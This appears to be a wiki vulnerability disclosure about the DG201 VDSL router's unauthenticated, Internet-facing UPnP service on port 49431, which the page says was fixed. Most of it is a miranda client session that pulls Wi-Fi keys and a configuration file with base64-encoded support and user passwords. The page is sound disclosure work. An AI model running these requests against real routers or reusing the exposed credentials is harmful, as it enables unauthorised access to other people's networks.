Differences between revisions 1 and 2
Revision 1 as of 2015-12-30 10:05:53
Size: 2711
Editor: turmio
Comment:
Revision 2 as of 2015-12-30 10:06:46
Size: 2724
Editor: turmio
Comment:
Deletions are marked like this. Additions are marked like this.
Line 5: Line 5:
DG201 VDSL-box has UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet. DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet.

Intro

This vulnerability is reported 2013-11-22 and it is fixed couple of month after that.

DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet.

From UPnP-service you can for example download device configuration which include passwords etc. It is also possible to change configuration in the device. Everything can be done without any authentication.

  • Software version: DG201A-W2U4U_4.06DNT0934.2

    • inteno.PNG

Details

UPnP service can be found from port TCP 49431.

Get UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/

Example

I have manually added my public IP to the configuration which is basically list of hosts in python pickle. 

$ python miranda.py -s upnp-inteno.mir 

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com


Host data restored:

        [0] 10.0.2.187:8888
        [1] 192.168.1.1:49431
        [2] 192.168.1.1:49431
        [3] 213.216.x.x:49431
        [4] 85.131.x.x:49431

upnp> host get 3

Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase : 
NewPreSharedKey : abbaabba
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>

...

Contacts